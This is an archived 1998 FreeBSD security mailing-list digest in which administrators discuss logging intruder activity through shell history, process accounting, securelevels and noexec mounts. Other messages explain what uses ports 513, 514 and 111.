www.linux.org | www.apache.org | www.perl.com "Turn up the lights, I don't want to go home in the dark." On Fri, 28 Aug 1998, Zahemszky Gabor wrote: >> Brian Behlendorf wrote in message ID >> <19980827182323.6798.qmail@hyperreal.org>: >> > Is there a fool-proof way to get user histories like this? I got one once >> > only because the cracker was lame enough to forget to delete his >> > .bash_history file. Presuming root isn't compromised of course... >> >> Force the history files to be created with uappend flag set and run with a non >> zero security level. > >Please! What is the correct way to change security-level? Where can I do it? >Yes, I know that in rc*, but which? And where? > >ZGabor at CoDe dot HU > >-- >#!/bin/ksh >Z='21N16I25C25E30, 40M30E33E25T15U!' ;IFS=' ABCDEFGHIJKLMNOPQRSTUVWXYZ ';set $Z ;for i { [[ $i = ? ]]&&print $i&&break;[[ $i = ??? ]]&&j=$i&&i=${i%?};typeset -i40 i=8#$i;print -n ${i#???};[[ "$j" = ??? ]]&&print -n "${j#??} "&&j=;typeset +i i;};IFS=' 0123456789 ';set $Z;X=;for i { [[ $i = , ]]&&i=2;[[ $i = ?? ]]||typeset -l i;X="$X $i";typeset +l i;};print "$X" > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 28 15:37:29 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA03161 for freebsd-security-outgoing; Fri, 28 Aug 1998 15:37:29 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA03154 for ; Fri, 28 Aug 1998 15:37:27 -0700 (PDT) (envelope-from jkb@best.com) Received: from localhost (jkb@localhost) by shell6.ba.best.com (8.9.0/8.9.0/best.sh) with SMTP id PAA25617; Fri, 28 Aug 1998 15:36:29 -0700 (PDT) X-Authentication-Warning: shell6.ba.best.com: jkb owned process doing -bs Date: Fri, 28 Aug 1998 15:36:29 -0700 (PDT) From: "Jan B. Koum " X-Sender: jkb@shell6.ba.best.com To: Adam McDougall cc: security@FreeBSD.ORG Subject: Re: Shell history (Was: Re: post breakin log) In-Reply-To: <35E6F857.1E8A4101@ameritech.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 28 Aug 1998, Adam McDougall wrote: >Jan B. Koum wrote: >> >> What if the user would be to switch shell or to install their own? >> >> I do not think one should depend on shell history to log all what >> user does. Best way to implement something like watch(8) to check >> the ttys you want or to automatically start when someone attaches >> to a tty. Again, this is also flawed.. what if someone simply > > >If you are that interested about what a particular user is doing on your >system, should they even have an account? :) I am not. I don't even have systems on which users have an account. This discussion arose from the "how do we track back what intruders did on our system" type discussion. :) > >You could plop a script(1) command in their .cshrc or maybe in the >system cshrc, etc if user=soandso > >SCRIPT(1) FreeBSD General Commands Manual >SCRIPT(1) > >NAME > script - make typescript of terminal session cat /dev/null > typescript Ok, so you have $HOME/typescript append only through chflags. But: DESCRIPTION Script makes a typescript of everything printed on your terminal. It is useful for students who need a hardcopy record of an interactive session as proof of an assignment, as the typescript file can be printed out later with lpr(1). This software was not designed with security in mind, hence... -- Yan > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 28 15:46:40 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA04258 for freebsd-security-outgoing; Fri, 28 Aug 1998 15:46:40 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from server.computeralt.com (server.computeralt.com [207.41.29.10]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA04225 for ; Fri, 28 Aug 1998 15:46:26 -0700 (PDT) (envelope-from scott@computeralt.com) Received: from scott (scott.computeralt.com [207.41.29.100]) by server.computeralt.com (8.9.1/8.9.1) with SMTP id SAA08761 for ; Fri, 28 Aug 1998 18:45:27 -0400 (EDT) Message-Id: <199808282245.SAA08761@server.computeralt.com> X-Sender: scott@mail.computeralt.com X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1.0.49 (Beta) Date: Fri, 28 Aug 1998 18:45:40 -0400 To: freebsd-security@FreeBSD.ORG From: "Scott I. Remick" Subject: What might use these ports? Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org For the sake of something else to discuss... :) Is there anything legit that might use the following ports? 513, 514, 111 513 is listed in /etc/services as used by "remote login a la telnet" as well as whod. It says 514 is used by the shell. 111 is.... sunrpc 111/tcp rpcbind #SUN Remote Procedure Call So are 513 and 514 for real? How are they legitamately used? And what (in a normal install) might use 111??? Thanks a bunch. ----------------------- Scott I. Remick mailto:scott@computeralt.com Network and Information Systems (802)388-7545 FAX:(802)388-3697 Computer Alternatives, Inc. http://www.computeralt.com Theater is life. Television is furniture. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 28 16:13:15 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA07845 for freebsd-security-outgoing; Fri, 28 Aug 1998 16:13:15 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id QAA07838 for ; Fri, 28 Aug 1998 16:13:06 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.1/8.9.1) id TAA14927; Fri, 28 Aug 1998 19:12:10 -0400 (EDT) (envelope-from wollman) Date: Fri, 28 Aug 1998 19:12:10 -0400 (EDT) From: Garrett Wollman Message-Id: <199808282312.TAA14927@khavrinen.lcs.mit.edu> To: "Scott I. Remick" Cc: freebsd-security@FreeBSD.ORG Subject: What might use these ports? In-Reply-To: <199808282245.SAA08761@server.computeralt.com> References: <199808282245.SAA08761@server.computeralt.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > For the sake of something else to discuss... :) > Is there anything legit that might use the following ports? > 513, 514, 111 rlogin, rsh, and ONC RPC's portmapper, respectively. -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 28 16:55:58 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA12147 for freebsd-security-outgoing; Fri, 28 Aug 1998 16:55:58 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id QAA12138 for ; Fri, 28 Aug 1998 16:55:56 -0700 (PDT) (envelope-from jkb@best.com) Received: from localhost (jkb@localhost) by shell6.ba.best.com (8.9.0/8.9.0/best.sh) with SMTP id QAA08826; Fri, 28 Aug 1998 16:55:00 -0700 (PDT) X-Authentication-Warning: shell6.ba.best.com: jkb owned process doing -bs Date: Fri, 28 Aug 1998 16:54:59 -0700 (PDT) From: "Jan B. Koum " X-Sender: jkb@shell6.ba.best.com To: "Scott I. Remick" cc: freebsd-security@FreeBSD.ORG Subject: Re: What might use these ports? In-Reply-To: <199808282245.SAA08761@server.computeralt.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 28 Aug 1998, Scott I. Remick wrote: >For the sake of something else to discuss... :) > >Is there anything legit that might use the following ports? > >513, 514, 111 > >513 is listed in /etc/services as used by "remote login a la telnet" as >well as whod. It says 514 is used by the shell. > >111 is.... > >sunrpc 111/tcp rpcbind #SUN Remote Procedure Call > >So are 513 and 514 for real? How are they legitamately used? And what (in >a normal install) might use 111??? Yes, ports 513 and 514 are for real. However you should try to avoid using rshell and rlogin protocols (which need those ports) and instead use SSH (ftp://ftp.funet.fi/pub/unix/security/login/ssh). How are they legitimately used? You mean, which programs? Uhm.. "man rlogin rsh" As for 111 - this is used by portmapers. You should turn it off if you don't have a need for it. Edit /etc/rc.conf to do so. What programs might use portmaper? The ones which make RPC calls. I personally have yet not had a need for RPC on my system. Solaris on the other hand.. well.. another story: % rpcinfo -p ***.sjsu.edu program vers proto port 100000 4 tcp 111 portmapper 100000 3 tcp 111 portmapper 100000 2 tcp 111 portmapper 100000 4 udp 111 portmapper 100000 3 udp 111 portmapper 100000 2 udp 111 portmapper 100024 1 udp 32783 status 100024 1 tcp 32778 status 100021 1 udp 4045 nlockmgr 100021 2 udp 4045 nlockmgr 100021 3 udp 4045 nlockmgr 100021 4 udp 4045 nlockmgr 100011 1 udp 32788 rquotad 100002 2 udp 32789 rusersd 100002 3 udp 32789 rusersd 100002 2 tcp 32779 rusersd 100002 3 tcp 32779 rusersd 100012 1 udp 32790 sprayd 100008 1 udp 32791 walld 100001 2 udp 32792 rstatd 100001 3 udp 32792 rstatd 100001 4 udp 32792 rstatd 100083 1 tcp 32785 ttdbserver 100021 1 tcp 4045 nlockmgr 100021 2 tcp 4045 nlockmgr 100021 3 tcp 4045 nlockmgr 100021 4 tcp 4045 nlockmgr 100003 2 tcp 2049 nfs 100003 3 tcp 2049 nfs 100026 1 udp 32843 bootparamd 100026 1 tcp 32924 bootparamd [2 pages of other crap sniped] > >Thanks a bunch. Wasn't sure what you were asking. Does the above help? -- Yan >----------------------- >Scott I. Remick mailto:scott@computeralt.com >Network and Information Systems (802)388-7545 FAX:(802)388-3697 >Computer Alternatives, Inc. http://www.computeralt.com > >Theater is life. Television is furniture. > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 28 16:58:25 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA12460 for freebsd-security-outgoing; Fri, 28 Aug 1998 16:58:25 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.224.24]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id QAA12438 for ; Fri, 28 Aug 1998 16:58:18 -0700 (PDT) (envelope-from avalon@coombs.anu.edu.au) Message-Id: <199808282358.QAA12438@hub.freebsd.org> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA216148587; Sat, 29 Aug 1998 09:56:27 +1000 From: Darren Reed Subject: Re: Shell history (Was: Re: post breakin log) To: kelly@plutotech.com (Sean Kelly) Date: Sat, 29 Aug 1998 09:56:27 +1000 (EST) Cc: clash@tasam.com, jkb@best.com, security@FreeBSD.ORG In-Reply-To: <35E6C761.BF4CEAA2@plutotech.com> from "Sean Kelly" at Aug 28, 98 09:06:09 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Sean Kelly, sie said: > > > I don't know that much kernel stuff, but what if you hacked the kernel so > > that whatever syscall opens/forks a new process will log the process name > > and parameters? > > Set > > accounting_enable="YES" > > in /etc/rc.conf. doesn't record command line options and truncates the executables name at 8 bytes. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 28 22:07:08 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA10955 for freebsd-security-outgoing; Fri, 28 Aug 1998 22:07:08 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from peak.mountin.net (peak.mountin.net [207.227.119.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA10950 for ; Fri, 28 Aug 1998 22:07:04 -0700 (PDT) (envelope-from jeff-ml@mountin.net) Received: (from daemon@localhost) by peak.mountin.net (8.9.1/8.9.1) id AAA02294; Sat, 29 Aug 1998 00:05:41 -0500 (CDT) Received: from aridius-108.isdn.mke.execpc.com(169.207.66.235) by peak.mountin.net via smap (V1.3) id sma002292; Sat Aug 29 00:05:19 1998 Message-Id: <3.0.3.32.19980828235925.00b1b5ec@207.227.119.2> X-Sender: jeff-ml@207.227.119.2 X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.3 (32) Date: Fri, 28 Aug 1998 23:59:25 -0500 To: "Jan B. Koum " From: "Jeffrey J. Mountin" Subject: Re: Shell history Cc: security@FreeBSD.ORG In-Reply-To: References: <199808280519.PAA04932@henry.cs.adfa.oz.au> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 11:05 PM 8/27/98 -0700, Jan B. Koum wrote: >On Fri, 28 Aug 1998, Warren Toomey wrote: > >>In article by Jan B. Koum: >>> What if the user would be to switch shell or to install their own? >>> I do not think one should depend on shell history to log all what >>> user does. How would YOU monitor what your users are >>> doing if you had to? >> >> accton(8), lastcomm(1) >> >> Warren >> > > Once can just "cp" the executable. But in order to 'cp' you must be able to read. Why have more permissions than needed? Jeff Mountin - Unix Systems TCP/IP networking jeff@mountin.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 28 22:12:02 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA11239 for freebsd-security-outgoing; Fri, 28 Aug 1998 22:12:02 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA11234 for ; Fri, 28 Aug 1998 22:12:01 -0700 (PDT) (envelope-from jkb@best.com) Received: from localhost (jkb@localhost) by shell6.ba.best.com (8.9.0/8.9.0/best.sh) with SMTP id WAA17402; Fri, 28 Aug 1998 22:10:53 -0700 (PDT) X-Authentication-Warning: shell6.ba.best.com: jkb owned process doing -bs Date: Fri, 28 Aug 1998 22:10:53 -0700 (PDT) From: "Jan B. Koum " X-Sender: jkb@shell6.ba.best.com To: "Jeffrey J. Mountin" cc: security@FreeBSD.ORG Subject: Re: Shell history In-Reply-To: <3.0.3.32.19980828235925.00b1b5ec@207.227.119.2> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 28 Aug 1998, Jeffrey J. Mountin wrote: >At 11:05 PM 8/27/98 -0700, Jan B. Koum wrote: >>On Fri, 28 Aug 1998, Warren Toomey wrote: >> >>>In article by Jan B. Koum: >>>> What if the user would be to switch shell or to install their own? >>>> I do not think one should depend on shell history to log all what >>>> user does. How would YOU monitor what your users are >>>> doing if you had to? >>> >>> accton(8), lastcomm(1) >>> >>> Warren >>> >> >> Once can just "cp" the executable. > > >But in order to 'cp' you must be able to read. > >Why have more permissions than needed? > > > > >Jeff Mountin - Unix Systems TCP/IP networking >jeff@mountin.net > Uhm.. I don't have to read. If I want to execute something and it is in my path, I just "cp `which vi` ./..." and then "./..." Taking away read permissions from directories such as /bin, /sbin and etc. is just security through obscurity IMHO unless you are doing some other things such as trusted path execution, chroot'ed environment, etc. -- Yan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 28 22:37:28 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA14034 for freebsd-security-outgoing; Fri, 28 Aug 1998 22:37:28 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from empnet.com (empnet.com [12.7.96.3]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA14029 for ; Fri, 28 Aug 1998 22:37:26 -0700 (PDT) (envelope-from scex@dqc.org) Received: from dqc.org (scex@dqc.org [12.7.119.10]) by empnet.com (8.8.8/EmpireNet-1) with SMTP id WAA11637; Fri, 28 Aug 1998 22:38:05 -0700 (PDT) Date: Fri, 28 Aug 1998 22:30:44 -0700 (PDT) From: scex To: "Jan B. Koum " cc: "Jeffrey J. Mountin" , security@FreeBSD.ORG Subject: Re: Shell history In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > >> Once can just "cp" the executable. > >But in order to 'cp' you must be able to read. > >Why have more permissions than needed? > Uhm.. I don't have to read. If I want to execute something and it > is in my path, I just "cp `which vi` ./..." and then "./..." > Taking away read permissions from directories such as /bin, /sbin > and etc. is just security through obscurity IMHO unless you are doing some > other things such as trusted path execution, chroot'ed environment, etc. [scex@twist] [~]$ cd bin [scex@twist] [bin]$ ll bash -rwx------ 1 scex users - 389120 Aug 20 03:31 bash* [scex@twist] [bin]$ chmod 711 bash [scex@twist] [bin]$ ll bash -rwx--x--x 1 scex users - 389120 Aug 20 03:31 bash* [scex@twist] [bin]$ su nobody Password: [nobody@twist] [bin]$ cp bash /tmp/... cp: bash: permission denied no-one's talking about taking away read permissions from directories (although that also has its applications); you have to have read permission on a file to be able to copy it (unless you fancy mucking around in /proc & streams). scex To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 28 22:44:00 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA14658 for freebsd-security-outgoing; Fri, 28 Aug 1998 22:44:00 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA14650 for ; Fri, 28 Aug 1998 22:43:56 -0700 (PDT) (envelope-from jkb@best.com) Received: from localhost (jkb@localhost) by shell6.ba.best.com (8.9.0/8.9.0/best.sh) with SMTP id WAA20086; Fri, 28 Aug 1998 22:42:53 -0700 (PDT) X-Authentication-Warning: shell6.ba.best.com: jkb owned process doing -bs Date: Fri, 28 Aug 1998 22:42:52 -0700 (PDT) From: "Jan B. Koum " X-Sender: jkb@shell6.ba.best.com To: scex cc: "Jeffrey J. Mountin" , security@FreeBSD.ORG Subject: Re: Shell history In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 28 Aug 1998, scex wrote: >> >> Once can just "cp" the executable. > >> >But in order to 'cp' you must be able to read. > >> >Why have more permissions than needed? > >> Uhm.. I don't have to read. If I want to execute something and it >> is in my path, I just "cp `which vi` ./..." and then "./..." > >> Taking away read permissions from directories such as /bin, /sbin >> and etc. is just security through obscurity IMHO unless you are doing some >> other things such as trusted path execution, chroot'ed environment, etc. > >[scex@twist] [~]$ cd bin >[scex@twist] [bin]$ ll bash >-rwx------ 1 scex users - 389120 Aug 20 03:31 bash* >[scex@twist] [bin]$ chmod 711 bash >[scex@twist] [bin]$ ll bash >-rwx--x--x 1 scex users - 389120 Aug 20 03:31 bash* >[scex@twist] [bin]$ su nobody >Password: >[nobody@twist] [bin]$ cp bash /tmp/... >cp: bash: permission denied > >no-one's talking about taking away read permissions from directories >(although that also has its applications); you have to have read >permission on a file to be able to copy it (unless you fancy mucking >around in /proc & streams). > >scex > > Hmm.. you are right, but what will stop an attacker who has freebsd box or has access to one to download the binary? -- Yan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 28 23:23:56 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA19478 for freebsd-security-outgoing; Fri, 28 Aug 1998 23:23:56 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from shell.futuresouth.com (shell.futuresouth.com [198.78.58.28]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA19468 for ; Fri, 28 Aug 1998 23:23:52 -0700 (PDT) (envelope-from fullermd@futuresouth.com) Received: (from fullermd@localhost) by shell.futuresouth.com (8.8.8/8.8.8) id BAA27585; Sat, 29 Aug 1998 01:22:45 -0500 (CDT) Message-ID: <19980829012245.54585@futuresouth.com> Date: Sat, 29 Aug 1998 01:22:45 -0500 From: "Matthew D. Fuller" To: "Jan B. Koum " Cc: scex , "Jeffrey J. Mountin" , security@FreeBSD.ORG Subject: Re: Shell history References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.88 In-Reply-To: ; from Jan B. Koum on Fri, Aug 28, 1998 at 10:42:52PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Aug 28, 1998 at 10:42:52PM -0700, Jan B. Koum woke me up to tell me: > Hmm.. you are right, but what will stop an attacker who has > freebsd box or has access to one to download the binary? mount -u -o noexec /home? (and /tmp, of course) *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* | FreeBSD; the way computers were meant to be | * "The only reason I'm burning my candle at both ends, is * | that I haven't figured out how to light the middle yet."| * fullermd@futuresouth.com :-} MAtthew Fuller * | http://keystone.westminster.edu/~fullermd | *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 28 23:35:56 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA20983 for freebsd-security-outgoing; Fri, 28 Aug 1998 23:35:56 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from empnet.com (empnet.com [12.7.96.3]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA20977 for ; Fri, 28 Aug 1998 23:35:53 -0700 (PDT) (envelope-from scex@dqc.org) Received: from dqc.org (scex@dqc.org [12.7.119.10]) by empnet.com (8.8.8/EmpireNet-1) with SMTP id XAA14940; Fri, 28 Aug 1998 23:36:42 -0700 (PDT) Date: Fri, 28 Aug 1998 23:29:23 -0700 (PDT) From: scex To: "Jan B. Koum " cc: "Jeffrey J. Mountin" , security@FreeBSD.ORG Subject: Re: Shell history In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Hmm.. you are right, but what will stop an attacker who has > freebsd box or has access to one to download the binary? nothing at all, & this can explain why so many people are getting 'hacked'.. lower irreversible security, ie less limitations on what you can do on the system to 'muck around' once you've owned a box. securelevels should be & will be when finally developed properly barriers on what you can do with a unix/whatever system. if o/s's ship out of the box secure, in this case by segmenting priveledge very thoroughly, there will be "less to hack", & so disregard our development as thinking human beings. or maybe i've had 8 cones too many. anyway, as we can see from this little venture, you have to do better than just stop people copying their own shell or making their own shell if you want full 'big brother' ie sniffing/spying/monitoring whatever, ways of doing this being trusted path execution & so on. i'm kinda confused now so i'll just go chill on irc for a while, come back & see if any of that made sense... (; scex To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Aug 29 00:21:13 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA24917 for freebsd-security-outgoing; Sat, 29 Aug 1998 00:21:13 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from banshee.cs.uow.edu.au (banshee.cs.uow.edu.au [130.130.188.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA24898 for ; Sat, 29 Aug 1998 00:21:03 -0700 (PDT) (envelope-from ncb05@banshee.cs.uow.edu.au) Received: (from ncb05@localhost) by banshee.cs.uow.edu.au (8.9.1/8.9.1) id RAA05549; Sat, 29 Aug 1998 17:19:49 +1000 (EST) Date: Sat, 29 Aug 1998 17:19:49 +1000 (EST) From: Nicholas Charles Brawn X-Sender: ncb05@banshee.cs.uow.edu.au To: "Matthew D. Fuller" cc: "Jan B. Koum " , scex , "Jeffrey J. Mountin" , security@FreeBSD.ORG Subject: Re: Shell history In-Reply-To: <19980829012245.54585@futuresouth.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 29 Aug 1998, Matthew D. Fuller wrote: > On Fri, Aug 28, 1998 at 10:42:52PM -0700, Jan B. Koum woke me up to tell me: > > Hmm.. you are right, but what will stop an attacker who has > > freebsd box or has access to one to download the binary? > > mount -u -o noexec /home? > (and /tmp, of course) > Or you could try my trusted path execution patch: http://rabble.uow.edu.au/~nick/security/tpe.stable.diff Of course, by that stage we're down to worrying about LD_LIBRARY_PATH problems, and interpreters such as perl. :) Nick -- Email: ncb05@uow.edu.au - http://rabble.uow.edu.au/~nick Key fingerprint = DE 30 33 D3 16 91 C8 8D A7 F8 70 03 B7 77 1A 2A "When in doubt, ask someone wiser than yourself..." -unknown To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Aug 29 00:27:17 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA25599 for freebsd-security-outgoing; Sat, 29 Aug 1998 00:27:17 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from aniwa.sky (aniwa.actrix.gen.nz [203.96.56.186]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA25587 for ; Sat, 29 Aug 1998 00:27:09 -0700 (PDT) (envelope-from andrew@squiz.co.nz) Received: from localhost (andrew@localhost) by aniwa.sky (8.8.7/8.8.7) with SMTP id TAA05027; Sat, 29 Aug 1998 19:24:00 +1200 (NZST) (envelope-from andrew@squiz.co.nz) Date: Sat, 29 Aug 1998 19:23:59 +1200 (NZST) From: Andrew McNaughton X-Sender: andrew@aniwa.sky Reply-To: andrew@squiz.co.nz To: "Matthew D. Fuller" cc: "Jan B. Koum " , scex , "Jeffrey J. Mountin" , security@FreeBSD.ORG Subject: Re: Shell history In-Reply-To: <19980829012245.54585@futuresouth.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 29 Aug 1998, Matthew D. Fuller wrote: > On Fri, Aug 28, 1998 at 10:42:52PM -0700, Jan B. Koum woke me up to tell me: > > Hmm.. you are right, but what will stop an attacker who has > > freebsd box or has access to one to download the binary? > > mount -u -o noexec /home? > (and /tmp, of course) Does this stop an attacker doing something like loading a file as a library from perl, using code on stdin? ANdrew To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Aug 29 01:37:46 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA01640 for freebsd-security-outgoing; Sat, 29 Aug 1998 01:37:46 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from tversu.ru (mail.tversu.ru [62.76.80.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA01635 for ; Sat, 29 Aug 1998 01:37:41 -0700 (PDT) (envelope-from vadim@gala.tversu.ru) Received: from gala.tversu.ru (vadim@gala.tversu.ru [62.76.80.10]) by tversu.ru (8.8.8/8.8.8) with ESMTP id MAA05424; Sat, 29 Aug 1998 12:34:48 +0400 (MSD) Received: (from vadim@localhost) by gala.tversu.ru (8.8.8/8.8.8) id MAA10758; Sat, 29 Aug 1998 12:35:00 +0400 (MSD) Message-ID: <19980829123459.B10707@tversu.ru> Date: Sat, 29 Aug 1998 12:34:59 +0400 From: Vadim Kolontsov To: "Jan B. Koum " , scex Cc: "Jeffrey J. Mountin" , security@FreeBSD.ORG Subject: Re: Shell history References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93i In-Reply-To: ; from Jan B. Koum on Fri, Aug 28, 1998 at 10:42:52PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, On Fri, Aug 28, 1998 at 10:42:52PM -0700, Jan B. Koum wrote: > Hmm.. you are right, but what will stop an attacker who has > freebsd box or has access to one to download the binary? tech@openbsd.org (mailing list) currently discusses "breaking binary compatibility" issue.. Regards, V. -- Vadim Kolontsov Tver Internet Center NOC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Aug 29 03:24:38 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org 